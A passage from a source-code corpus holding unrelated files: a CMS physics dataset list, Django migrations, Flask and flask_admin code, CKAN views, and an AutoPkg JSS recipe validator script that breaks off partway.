'SingleElectron_2016rereco_RunE', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v1/data//TnPTree_SingleElectron_2016rereco_RunE.root', 'lumi': 4.054, 'nEvts': 113169852}, # {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v1/crab_2016rereco_RunF//results/processedLumis.json', 'campaign': 'crab_projects_v1', 'dataset': 'SingleElectron_2016rereco_RunF', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v1/data//TnPTree_SingleElectron_2016rereco_RunF.root', 'lumi': 3.085, 'nEvts': 69673589}, # {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v1/crab_2016rereco_RunG//results/processedLumis.json', 'campaign': 'crab_projects_v1', 'dataset': 'SingleElectron_2016rereco_RunG', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v1/data//TnPTree_SingleElectron_2016rereco_RunG.root', 'lumi': 7.521, 'nEvts': 151654044}, # {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/new/CMSSW_8_0_10/src/PhysicsTools/TagAndProbe/crab/crab_projects_elev2/crab_2016_RunB/results/processedLumis.json', 'campaign': 'crab_projects_elev2', 'dataset': 'SingleElectron_2016_RunB', 'file': '/store/group/phys_egamma/tnp/80X/Photons_76Xids/elev2/data//TnPTree_SingleElectron_2016_RunB.root', 'lumi': 5.657, 'nEvts': 228669688}, # {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_13_patch1/src/PhysicsTools/TagAndProbe/crab/crab_projects_elev2/crab_2016_RunC//results/processedLumis.json', 'campaign': 'crab_projects_elev2', 'dataset': 'SingleElectron_2016_RunC', 'file': '/store/group/phys_egamma/tnp/80X/Photons_76Xids/elev2/data//TnPTree_SingleElectron_2016_RunC.root', 'lumi': 1.761, 'nEvts': 63419101}, # {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/new/CMSSW_8_0_10/src/PhysicsTools/TagAndProbe/crab/crab_projects_elev2/crab_DYToLL_madgraph/results/processedLumis.json', 'campaign': 'crab_projects_elev2', 'dataset': 'DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8', 'file': '/store/group/phys_egamma/tnp/80X/Photons_76Xids/elev2/mc//TnPTree_DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8.root', 'lumi': -1, 'nEvts': 36311064}, # {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/new/CMSSW_8_0_10/src/PhysicsTools/TagAndProbe/crab/crab_projects_elev2/crab_DYToLL_mcAtNLO//processedLumis.json', 'campaign': 'crab_projects_elev2', 'dataset': 'DYJetsToLL_M-50_TuneCUETP8M1_13TeV-amcatnloFXFX-pythia8', 'file': '/store/group/phys_egamma/tnp/80X/Photons_76Xids/elev2/mc//TnPTree_DYJetsToLL_M-50_TuneCUETP8M1_13TeV-amcatnloFXFX-pythia8.root', 'lumi': -1, 'nEvts': 28696958}, # {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/new/CMSSW_8_0_10/src/PhysicsTools/TagAndProbe/crab/crab_projects_elev2/crab_WJets_madgraph//results/processedLumis.json', 'campaign': 'crab_projects_elev2', 'dataset': 'WJetsToLNu_TuneCUETP8M1_13TeV-madgraphMLM-pythia8', 'file': '/store/group/phys_egamma/tnp/80X/Photons_76Xids/elev2/mc//TnPTree_WJetsToLNu_TuneCUETP8M1_13TeV-madgraphMLM-pythia8.root', 'lumi': -1, 'nEvts': 24908024}, # {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/new/CMSSW_8_0_10/src/PhysicsTools/TagAndProbe/crab/crab_projects_phov2/crab_2016_RunB//results/processedLumis.json', 'campaign': 'crab_projects_phov2', 'dataset': 'SingleElectron', 'file': '/store/group/phys_egamma/tnp/80X/Photons_76Xids/phov2/data//TnPTree_SingleElectron.root', 'lumi': 5.848, 'nEvts': 236203597}, # {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/new/CMSSW_8_0_10/src/PhysicsTools/TagAndProbe/crab/crab_projects_phov2/crab_DYToLL_madgraph//results/processedLumis.json', 'campaign': 'crab_projects_phov2', 'dataset': 'DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8', 'file': '/store/group/phys_egamma/tnp/80X/Photons_76Xids/phov2/mc//TnPTree_DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8.root', 'lumi': -1, 'nEvts': 41253879}, # {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/new/CMSSW_8_0_10/src/PhysicsTools/TagAndProbe/crab/crab_projects_phov2/crab_DYToLL_mcAtNLO//results/processedLumis.json', 'campaign': 'crab_projects_phov2', 'dataset': 'DYJetsToLL_M-50_TuneCUETP8M1_13TeV-amcatnloFXFX-pythia8', 'file': '/store/group/phys_egamma/tnp/80X/Photons_76Xids/phov2/mc//TnPTree_DYJetsToLL_M-50_TuneCUETP8M1_13TeV-amcatnloFXFX-pythia8.root', 'lumi': -1, 'nEvts': 28696958}, # {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/new/CMSSW_8_0_10/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOv3/crab_2016_RunB//results/processedLumis.json', 'campaign': 'crab_projects_RECOv3', 'dataset': 'SingleElectron_2016_RunB', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOv3/data//TnPTree_SingleElectron_2016_RunB.root', 'lumi': 5.401, 'nEvts': 211415403}, # {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_13_patch1/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOv3/crab_2016_RunC//results/processedLumis.json', 'campaign': 'crab_projects_RECOv3', 'dataset': 'SingleElectron_2016_RunC', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOv3/data//TnPTree_SingleElectron_2016_RunC.root', 'lumi': 1.730, 'nEvts': 62332526}, # {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/new/CMSSW_8_0_10/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOv3/crab_DYToLL_madgraph//results/processedLumis.json', 'campaign': 'crab_projects_RECOv3', 'dataset': 'DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOv3/mc//TnPTree_DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8.root', 'lumi': -1, 'nEvts': 49877138}, # {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/new/CMSSW_8_0_10/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOv3/crab_DYToLL_mcAtNLO//results/processedLumis.json', 'campaign': 'crab_projects_RECOv3', 'dataset': 'DYJetsToLL_M-50_TuneCUETP8M1_13TeV-amcatnloFXFX-pythia8', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOv3/mc//TnPTree_DYJetsToLL_M-50_TuneCUETP8M1_13TeV-amcatnloFXFX-pythia8.root', 'lumi': -1, 'nEvts': 28328619} ]
2c513021cb031fcdb1c6bf1db308b216812e673a
ca259dd96261af73d470cbf93714db8219511111
/core/apps/storage/migrations/0008_cephstorage.py
bf075e00083b8a727ce04d05db9db269fbab0952
[ "Apache-2.0" ]
permissive
jedia168/KubeOperator
243812a898646b90b38aab56af672b1e218191ff
87917cf95f88584ddbc68c50522656bbe42934ec
refs/heads/master
2021-05-23T00:40:32.206564
2020-04-03T10:44:39
2020-04-03T10:44:57
253,158,258
3
0
Apache-2.0
2020-04-05T04:53:20
2020-04-05T04:53:20
null
UTF-8
Python
false
false
684
py
# Generated by Django 2.1.11 on 2019-12-05 04:06 import common.models from django.db import migrations, models import uuid class Migration(migrations.Migration): dependencies = [ ('storage', '0007_auto_20191024_0442'), ] operations = [ migrations.CreateModel( name='CephStorage', fields=[ ('id', models.UUIDField(default=uuid.uuid4, primary_key=True, serialize=False)), ('name', models.CharField(max_length=255, unique=True)), ('vars', common.models.JsonDictTextField()), ('date_created', models.DateTimeField(auto_now_add=True)), ], ), ]
df9d8d9d26b3a715fd17b4a1fdbf8b7ea5a0026c
477b72708f02ec317a371b9bedfa65d316c48d3c
/server-flask/config.py
c34f090a816b9c03461f2725f469a3f97a218263
[]
no_license
AJenbo/web-api-project
bd01ba898f05d84abee3d89d39b57cf31f809fa2
ae2aa17f1011fe8ac655b8092cee6a4d34e8cda9
refs/heads/master
2021-02-11T13:17:23.949374
2020-03-02T19:15:35
2020-03-02T23:04:53
244,494,129
1
0
null
2020-03-02T23:02:47
2020-03-02T23:02:47
null
UTF-8
Python
false
false
276
py
import os basedir = os.path.abspath(os.path.dirname(__file__)) class Config(object): SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL') or \ 'sqlite:///' + os.path.join(basedir, 'app.db') SQLALCHEMY_TRACK_MODIFICATIONS = False JSON_SORT_KEYS = False
2d3a95480d633d66c46ef3c824a7c54fbf5b8504
3c8742678e10ce40f10da9499ed0aa4a7e5b3792
/flask/Lib/site-packages/flask_admin/model/fields.py
da38982fa16ddcac6e15042fa18b8373d3843569
[]
no_license
SYFT/brushproblem
f7f47f194a8bc1110bbfb615861268a2a4f3f84d
9818f89e645d324443ee22851f597c0904ef78a3
refs/heads/master
2021-01-18T21:51:53.393103
2016-09-11T04:01:48
2016-09-11T04:01:48
55,394,355
3
0
null
null
null
null
UTF-8
Python
false
false
8,381
py
import itertools from wtforms.validators import ValidationError from wtforms.fields import FieldList, FormField, SelectFieldBase try: from wtforms.fields import _unset_value as unset_value except ImportError: from wtforms.utils import unset_value from flask_admin._compat import iteritems from .widgets import (InlineFieldListWidget, InlineFormWidget, AjaxSelect2Widget, XEditableWidget) class InlineFieldList(FieldList): widget = InlineFieldListWidget() def __init__(self, *args, **kwargs): super(InlineFieldList, self).__init__(*args, **kwargs) def __call__(self, **kwargs): # Create template meta = getattr(self, 'meta', None) if meta: template = self.unbound_field.bind(form=None, name='', _meta=meta) else: template = self.unbound_field.bind(form=None, name='') # Small hack to remove separator from FormField if isinstance(template, FormField): template.separator = '' template.process(None) return self.widget(self, template=template, check=self.display_row_controls, **kwargs) def display_row_controls(self, field): return True def process(self, formdata, data=unset_value): res = super(InlineFieldList, self).process(formdata, data) # Postprocess - contribute flag if formdata: for f in self.entries: key = 'del-%s' % f.id f._should_delete = key in formdata return res def validate(self, form, extra_validators=tuple()): """ Validate this FieldList. Note that FieldList validation differs from normal field validation in that FieldList validates all its enclosed fields first before running any of its own validators. """ self.errors = [] # Run validators on all entries within for subfield in self.entries: if not self.should_delete(subfield) and not subfield.validate(form): self.errors.append(subfield.errors) chain = itertools.chain(self.validators, extra_validators) self._run_validation_chain(form, chain) return len(self.errors) == 0 def should_delete(self, field): return getattr(field, '_should_delete', False) def populate_obj(self, obj, name): values = getattr(obj, name, None) try: ivalues = iter(values) except TypeError: ivalues = iter([]) candidates = itertools.chain(ivalues, itertools.repeat(None)) _fake = type(str('_fake'), (object, ), {}) output = [] for field, data in zip(self.entries, candidates): if not self.should_delete(field): fake_obj = _fake() fake_obj.data = data field.populate_obj(fake_obj, 'data') output.append(fake_obj.data) setattr(obj, name, output) class InlineFormField(FormField): """ Inline version of the ``FormField`` widget. """ widget = InlineFormWidget() class InlineModelFormField(FormField): """ Customized ``FormField``. Excludes model primary key from the `populate_obj` and handles `should_delete` flag. """ widget = InlineFormWidget() def __init__(self, form_class, pk, form_opts=None, **kwargs): super(InlineModelFormField, self).__init__(form_class, **kwargs) self._pk = pk self.form_opts = form_opts def get_pk(self): return getattr(self.form, self._pk).data def populate_obj(self, obj, name): for name, field in iteritems(self.form._fields): if name != self._pk: field.populate_obj(obj, name) class ListEditableFieldList(FieldList): """ Modified FieldList to allow for alphanumeric primary keys. Used in the editable list view. """ widget = XEditableWidget() def __init__(self, *args, **kwargs): super(ListEditableFieldList, self).__init__(*args, **kwargs) # min_entries = 1 is required for the widget to determine the type self.min_entries = 1 def _extract_indices(self, prefix, formdata): offset = len(prefix) + 1 for name in formdata: # selects only relevant field (not CSRF, other fields, etc) if name.startswith(prefix): # exclude offset (prefix-), remaining text is the index yield name[offset:] def _add_entry(self, formdata=None, data=unset_value, index=None): assert not self.max_entries or len(self.entries) < self.max_entries, \ 'You cannot have more than max_entries entries in this FieldList' if index is None: index = self.last_index + 1 self.last_index = index # '%s-%s' instead of '%s-%d' to allow alphanumeric name = '%s-%s' % (self.short_name, index) id = '%s-%s' % (self.id, index) # support both wtforms 1 and 2 meta = getattr(self, 'meta', None) if meta: field = self.unbound_field.bind( form=None, name=name, prefix=self._prefix, id=id, _meta=meta ) else: field = self.unbound_field.bind( form=None, name=name, prefix=self._prefix, id=id ) field.process(formdata, data) self.entries.append(field) return field def populate_obj(self, obj, name): # return data from first item, instead of a list of items setattr(obj, name, self.data.pop()) class AjaxSelectField(SelectFieldBase): """ Ajax Model Select Field """ widget = AjaxSelect2Widget() separator = ',' def __init__(self, loader, label=None, validators=None, allow_blank=False, blank_text=u'', **kwargs): super(AjaxSelectField, self).__init__(label, validators, **kwargs) self.loader = loader self.allow_blank = allow_blank self.blank_text = blank_text def _get_data(self): if self._formdata: model = self.loader.get_one(self._formdata) if model is not None: self._set_data(model) return self._data def _set_data(self, data): self._data = data self._formdata = None data = property(_get_data, _set_data) def _format_item(self, item): value = self.loader.format(self.data) return (value[0], value[1], True) def process_formdata(self, valuelist): if valuelist: if self.allow_blank and valuelist[0] == u'__None': self.data = None else: self._data = None self._formdata = valuelist[0] def pre_validate(self, form): if not self.allow_blank and self.data is None: raise ValidationError(self.gettext(u'Not a valid choice')) class AjaxSelectMultipleField(AjaxSelectField): """ Ajax-enabled model multi-select field. """ widget = AjaxSelect2Widget(multiple=True) def __init__(self, loader, label=None, validators=None, default=None, **kwargs): if default is None: default = [] super(AjaxSelectMultipleField, self).__init__(loader, label, validators, default=default, **kwargs) self._invalid_formdata = False def _get_data(self): formdata = self._formdata if formdata: data = [] # TODO: Optimize? for item in formdata: model = self.loader.get_one(item) if item else None if model: data.append(model) else: self._invalid_formdata = True self._set_data(data) return self._data def _set_data(self, data): self._data = data self._formdata = None data = property(_get_data, _set_data) def process_formdata(self, valuelist): self._formdata = set() for field in valuelist: for n in field.split(self.separator): self._formdata.add(n) def pre_validate(self, form): if self._invalid_formdata: raise ValidationError(self.gettext(u'Not a valid choice'))
b46fa81c4d5e37b46a911e6053109b9b90a22674
9ccdadf53de7768ea10add415cbfcd76438178e4
/apps/sushi/migrations/0036_credentials_intermediate_report_types.py
51df8aafa473ce662dedadbdb135d81d599d3c53
[ "MIT" ]
permissive
techlib/celus
80e587b3238acf26007f654a38cbdeab558de39b
3b70d8d627b66b8181f3aaba572929a1daeca106
refs/heads/master
2023-07-08T10:42:12.252165
2023-04-12T13:02:19
2023-07-03T10:25:33
186,565,967
10
4
MIT
2023-02-15T19:53:48
2019-05-14T07:14:23
Python
UTF-8
Python
false
false
2,453
py
# Generated by Django 2.2.15 on 2020-10-01 10:59 from django.db import migrations, models def active_couter_reports_to_counter_reports(apps, schema_editor): CounterReportsToCredentials = apps.get_model('sushi', 'CounterReportsToCredentials') SushiCredentials = apps.get_model('sushi', 'SushiCredentials') for credentials in SushiCredentials.objects.all(): for counter_report in credentials.active_counter_reports.all(): CounterReportsToCredentials.objects.create( credentials=credentials, counter_report=counter_report ) def couter_reports_to_active_counter_reports(apps, schema_editor): CounterReportsToCredentials = apps.get_model('sushi', 'CounterReportsToCredentials') for cr2c in CounterReportsToCredentials.objects.all(): cr2c.credentials.active_counter_reports.add(cr2c.counter_report) class Migration(migrations.Migration): dependencies = [('sushi', '0035_sushifetchattempt_http_status_code')] operations = [ migrations.CreateModel( name='CounterReportsToCredentials', fields=[ ( 'id', models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name='ID' ), ), ( 'credentials', models.ForeignKey( on_delete=models.deletion.CASCADE, to='sushi.SushiCredentials' ), ), ( 'counter_report', models.ForeignKey( on_delete=models.deletion.CASCADE, to='sushi.CounterReportType' ), ), ], options={'unique_together': {('credentials', 'counter_report')}}, ), migrations.AddField( model_name='sushicredentials', name='counter_reports', field=models.ManyToManyField( through='sushi.CounterReportsToCredentials', to='sushi.CounterReportType', related_name='sushicredentials_set', ), ), migrations.RunPython( active_couter_reports_to_counter_reports, couter_reports_to_active_counter_reports ), migrations.RemoveField(model_name='sushicredentials', name='active_counter_reports'), ]
50f8904f9744ae5e5e841a4571e1af382fd9b1e9
c07f45a57aee12a227ac5efa48a785981b74e608
/ckanext/ckanext-apicatalog/ckanext/apicatalog/views/__init__.py
20adf432d9d9df71246a074f9cbe87af007926e4
[ "AGPL-3.0-only", "MIT" ]
permissive
vrk-kpa/api-catalog
44d465d3c9c12c41ef281f2073349777fdbdf9bf
a4dc0d12cd5d8886a2b46f62efe124fe5d26e799
refs/heads/master
2023-08-22T05:22:09.609871
2023-06-19T11:05:57
2023-06-19T11:05:57
42,986,648
19
9
MIT
2023-08-23T07:06:35
2015-09-23T07:54:38
HTML
UTF-8
Python
false
false
1,140
py
from flask import Blueprint, Response from ckan.plugins.toolkit import render, c from ckanext.apicatalog.helpers import get_announcements import ckanext.apicatalog.health as health import logging log = logging.getLogger(__name__) def get_blueprints(): return [announcements_bp, health_bp] # Announcements def announcements(): c.announcement_list = get_announcements(50) return render(u'announcements/index.html') announcements_bp = Blueprint("announcements", __name__) announcements_bp.add_url_rule(u'/announcements', view_func=announcements) # Health def health_check(): try: health.heartbeat() except health.HealthError as e: return Response(e.message, status=503) return Response('OK') def health_xroad_catalog_heartbeat(): try: health.xroad_catalog_heartbeat() return Response('OK') except health.HealthError as e: return Response(e.message, status=503) health_bp = Blueprint('health', __name__) health_bp.add_url_rule(u'/health', view_func=health_check) health_bp.add_url_rule(u'/xroad_catalog_heartbeat', view_func=health_xroad_catalog_heartbeat)
3f3081f32d5f4e05e8080904f17d349273eb67bb
2fd5ce9b3fb4f7cc545e3d42181ef89af7e11c05
/validate_recipes.py
36500a60114163f8feebf0884bc8737597bea0f4
[]
no_license
AllWorkAndNoPlay/jss-recipes
a9b4d3bde4c1bab41e2e5932a26cd52c5971b8d2
bd62d5a2ba585d4df5e3526c69aa6572cc8191ff
refs/heads/master
2023-06-24T21:04:10.046947
2023-06-09T17:29:05
2023-06-09T17:29:05
52,827,593
0
1
null
2017-11-28T00:17:48
2016-02-29T21:53:21
Python
UTF-8
Python
false
false
28,612
py
#!/usr/bin/python # Copyright (C) 2014-2015 Shea G Craig # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. """validate_recipes.py usage: validate_recipes.py [-h] [-v] recipe [recipe ...] Test recipes for compliance with the jss-recipe style guide. positional arguments: recipe Path to a recipe to validate, or to a folder, to recursively test all contained recipes. optional arguments: -h, --help show this help message and exit -v, --verbose Display results of all tests. """ import argparse import os import subprocess import sys # pylint: disable=no-name-in-module from Foundation import (NSData, NSPropertyListSerialization, NSPropertyListMutableContainersAndLeaves, NSPropertyListXMLFormat_v1_0) # pylint: enable=no-name-in-module __version__ = "1.0.0" REQUIRED_ARGUMENTS = ( "self_service_description", "category", "policy_template", "self_service_icon", "policy_category") OPTIONAL_ARGUMENTS = ( "jss_inventory_name", "os_requirements") PROHIBITED_ARGUMENTS = ( "site_name", "site_id") VALID_CATEGORIES = ( "Computer Science", "Digital Media", "Games", "Management", "Print and Scan", "Productivity", "Science and Math", "Utility") ALLOWED_EXTENSION_ATTRIBUTES = ( "CFBundleVersionExtensionAttribute.xml" ) class Error(Exception): """Module base exception.""" pass class PlistParseError(Error): """Error parsing a plist file.""" pass class Plist(dict): """Abbreviated plist representation (as a dict).""" def __init__(self, filename=None): """Init a Plist, optionally from parsing an existing file. Args: filename: String path to a plist file. """ if filename: dict.__init__(self, self.read_file(filename)) else: dict.__init__(self) self.new_plist() self.filename = os.path.abspath(filename) def read_file(self, path): """Replace internal XML dict with data from plist at path. Args: path: String path to a plist file. Raises: PlistParseError: Error in reading plist file. """ # pylint: disable=unused-variable info, pformat, error = ( NSPropertyListSerialization.propertyListWithData_options_format_error_( NSData.dataWithContentsOfFile_(os.path.expanduser(path)), NSPropertyListMutableContainersAndLeaves, None, None )) # pylint: enable=unused-variable if info is None: if error is None: error = "Invalid plist file." raise PlistParseError("Can't read %s: %s" % (path, error)) return info class Results(object): """Collects test results and manages their output.""" def __init__(self): self.results = [] def add_result(self, result): self.results.append(result) def report(self, verbose=False): if verbose or not all((result[0] for result in self.results)): for result in self.results: if verbose or not result[0]: self._print_result(result) else: print "OK" def report_all(self): self.report(verbose=True) def _print_result(self, line): print "Test: %s Result: %s" % (line[1], line[0]) def get_argument_parser(): """Build and return argparser for this app.""" parser = argparse.ArgumentParser(description="Test recipes for compliance " "with the jss-recipe style guide.") parser.add_argument("recipe", nargs="+", help="Path to a recipe to " "validate, or to a folder, to recursively test all " "contained recipes.") parser.add_argument("-v", "--verbose", help="Display results of all " "tests.", action="store_true") return parser def get_recipes(recipes): """Build a list of recipes from filename or dirname. Args: recipes: A string filename or path to a directory. Directories will be recursively searched for files ending with '.jss.recipe'. Returns: List of recipe files. """ result = [] if os.path.isfile(recipes): result.append(recipes) elif os.path.isdir(recipes): for root, dirs, files in os.walk(recipes): for filename in files: if filename.endswith(".jss.recipe"): result.append(os.path.join(root, filename)) return result def validate_recipe(recipe_path, verbose=False): """Test a recipe for compliance, printing progress. Args: recipe_path: String path to recipe file. """ tests = ( test_filename_prefix, test_filename_suffix, test_recipe_parsing, test_is_in_subfolder, test_folder_contents_have_common_prefix, test_no_restricted_files_in_folder, test_parent_recipe, test_identifier, test_single_processor, test_name_prod_name, test_argument_values, test_no_prohibited_arguments, test_input_section, test_category_value, test_policy_category_value, test_policy_template_value, test_icon_name, test_group_name, test_group_template, test_groups_argument, test_extension_attributes, test_scripts, test_icon, test_lint) header = " Testing recipe: %s " % recipe_path print_bar(len(header)) print header print_bar(len(header)) if os.path.exists(recipe_path): recipe = get_recipe(recipe_path) else: print "File not found." sys.exit(1) results = Results() for test in tests: try: result = test(recipe) # Handle missing plist keys rather than try to test for each # bit of a recipe. except KeyError as err: result = (False, "'%s' failed with missing key: '%s'" % (test.__name__, err.message)) except AttributeError as err: result = (False, "'%s' failed with missing attribute" % test.__name__) results.add_result(result) if verbose: results.report_all() else: results.report() def get_recipe(recipe_path): """Open a recipe file as an ElementTree. Args: recipe_path: String path to recipe file. Returns: ElementTree of the recipe, exception message if the recipe has parsing errors, or None if that file does not exist. """ try: recipe = Plist(recipe_path) except IOError: recipe = None except PlistParseError as err: recipe = err.message except ValueError: recipe = u"File does not exist." return recipe def test_filename_prefix(recipe): """Tests filename for correct prefix. Args: recipe_path: String path to a recipe file. Returns: Tuple of Bool: Failure or success, and a string describing the test and result. """ name = recipe["Input"].get("NAME") result = os.path.basename(recipe.filename).startswith(name) description = "Recipe has correct prefix (NAME: '%s')" % name return (result, description) def test_filename_suffix(recipe): """Tests filename for correct ending. Args: recipe_path: String path to a recipe file. Returns: Tuple of Bool: Failure or success, and a string describing the test and result. """ result = os.path.basename(recipe.filename).endswith(".jss.recipe") description = "Recipe has correct ending ('.jss.recipe')" return (result, description) def test_recipe_parsing(recipe): """Determine whether recipe file exists and parses. Args: recipe: Recipe object. Returns: Tuple of Bool: Failure or success, and a string describing the test and result. """ result = False description = "Recipe parses correctly." if not recipe: description += " (Recipe file not found!)" elif isinstance(recipe, unicode): # There was a parsing error. Print the message and finish. description += " (%s)" % recipe else: result = True return (result, description) def test_is_in_subfolder(recipe): """Determine whether recipe file is in a product subfolder. Args: recipe: Recipe object. Returns: Tuple of Bool: Failure or success, and a string describing the test and result. """ result = None name = recipe["Input"].get("NAME") description = "Recipe is in a subfolder named (NAME: '%s')." % name dirname = os.path.dirname(recipe.filename).rsplit("/", 1)[1] result = dirname == name return (result, description) def test_folder_contents_have_common_prefix(recipe): """Determine whether folder contents have a common prefix of NAME. Args: recipe: Recipe object. Returns: Tuple of Bool: Failure or success, and a string describing the test and result. """ result = None name = recipe["Input"].get("NAME") description = "All files have prefix of product (NAME: '%s')." % name files = os.listdir(os.path.dirname(recipe.filename)) result = all((filename.startswith(name) or filename == ".DS_Store" for filename in files)) return (result, description) def test_no_restricted_files_in_folder(recipe): """Determine whether folder contents have a common prefix of NAME. Args: recipe: Recipe object. Returns: Tuple of Bool: Failure or success, and a string describing the test and result. """ result = None restricted_files = ["PolicyTemplate.xml", "SmartGroupTemplate.xml"] description = ("None of the restricted templates %s are in recipe's " "folder." % restricted_files) files = os.listdir(os.path.dirname(recipe.filename)) result = all(restricted_file not in files for restricted_file in restricted_files) return (result, description) def test_parent_recipe(recipe): """Determine whether parent recipe is in AutoPkg org and not None. Uses a GitHub personal access token if one has been generated. This is helpful if you're validating a bunch of recipes at once and hitting the rate limit. Args: recipe: Recipe object. Returns: Tuple of Bool: Failure or success, and a string describing the test and result. """ parent = recipe.get("ParentRecipe") result = False description = "Parent Recipe is in AutoPkg org." if parent: cmd = ["autopkg", "search", parent] if os.path.exists(os.path.expanduser("~/.autopkg_gh_token")): cmd.insert(2, "--use-token") search_results = subprocess.check_output(cmd) expected_parents = (".pkg.recipe", ".download.recipe") if any(exp_par in search_results for exp_par in expected_parents): info_process = subprocess.Popen(["autopkg", "info", parent], stdin=subprocess.PIPE, stdout=subprocess.PIPE) # Send an "n" in case it didn't find anything. info_results = info_process.communicate("n") if "Didn't find a recipe for" in info_results[0]: description += (" (ParentRecipe repo not available. Add and " "retry.)") else: # Assume that since it found something, it's good. result = True else: description += " (ParentRecipe not set.)" return (result, description) def test_identifier(recipe): """Test recipe identifier for proper construction. Args: recipe: Recipe object. Returns: Tuple of Bool: Failure or success, and a string describing the test and result. """ name = recipe["Input"].get("NAME") if name: # The identifier may not have spaces. name = name.replace(" ", "") description = ("Recipe identifier follows convention. " "('com.github.jss-recipes.jss.%s')" % name) result = False identifier = recipe.get("Identifier") if identifier and name: if (str(identifier).startswith("com.github.jss-recipes.jss.") and str(identifier).rsplit(".", 1)[1].startswith(name)): result = True return (result, description) def test_single_processor(recipe): """Test for recipe having a single processor. Args: recipe: Recipe object. Returns: Tuple of Bool: Failure or success, and a string describing the test and result. """ description = "Recipe has only a single processor, of type 'JSSImporter'." result = False processors = recipe.get("Process") if len(processors) == 1: processor = processors[0].get("Processor") if processor and processor == "JSSImporter": result = True else: description += " (Processor is not 'JSSImporter')" else: description += " (Too many processors: %s > 1)" % len(processors) return (result, description) def get_jssimporter(recipe): """Return the JSSImporter processor section or None.""" processors = [processor for processor in recipe["Process"] if processor.get("Processor") == "JSSImporter"] if len(processors) == 1: result = processors.pop() else: result = None return result def test_argument_values(recipe): """Test for all arguments to JSSImporter being replacement vars. Args: recipe: Recipe object. Returns: Tuple of Bool: Failure or success, and a string describing the test and result. """ result = False description = ("All required and optional arguments to JSSImporter are " "%ALL_CAPS% replacement variables, and are present.") required_argument_values = (get_jssimporter(recipe)["Arguments"].get( argument) for argument in REQUIRED_ARGUMENTS) optional_argument_values = (get_jssimporter(recipe)["Arguments"].get( argument) for argument in OPTIONAL_ARGUMENTS) valid_required_values = all((val and val.isupper() and val.startswith("%") and val.endswith("%") for val in required_argument_values)) valid_optional_values = all((val.isupper() and val.startswith("%") and val.endswith("%") for val in required_argument_values if val)) if valid_required_values and valid_optional_values: result = True return (result, description) def test_name_prod_name(recipe): """Test for name Input and prod_name arg. Args: recipe: Recipe object. Returns: Tuple of Bool: Failure or success, and a string describing the test and result. """ result = False description = "NAME is set, and prod_name is %NAME%." if ("NAME" in recipe["Input"] and get_jssimporter(recipe)["Arguments"].get("prod_name") == "%NAME%"): result = True return (result, description) def test_no_prohibited_arguments(recipe): """Tests for prohibited arguments. Args: recipe: Recipe object. Returns: Tuple of Bool: Failure or success, and a string describing the test and result. """ result = False description = "No prohibited arguments." arguments = get_jssimporter(recipe)["Arguments"] if all((not prohibited_arg in arguments for prohibited_arg in PROHIBITED_ARGUMENTS)): result = True return (result, description) def test_input_section(recipe): """Test for all required and optional args in input section. All args should have actual values set in input section. Also, names must follow the convention of being ALL_CAPS equivalent of JSSImporter argument. Args: recipe: Recipe object. Returns: Tuple of Bool: Failure or success, and a string describing the test and result. """ result = False description = ("All required and optional arguments to JSSImporter are " "set in 'Input' section with ALL_CAPS keys.") required_input_keys = (recipe["Input"].get(argument.upper()) for argument in REQUIRED_ARGUMENTS) # Optional key must be present in JSSImporter args also! optional_input_keys = (recipe["Input"].get(argument.upper()) for argument in OPTIONAL_ARGUMENTS if get_jssimporter(recipe)["Arguments"].get(argument)) valid_required_keys = all((key is not None for key in required_input_keys)) valid_optional_keys = all((key is not None for key in optional_input_keys)) if valid_required_keys and valid_optional_keys: result = True return (result, description) def test_category_value(recipe): """Test for valid category. Args: recipe: Recipe object. Returns: Tuple of Bool: Failure or success, and a string describing the test and result. """ result = False description = "CATEGORY is in 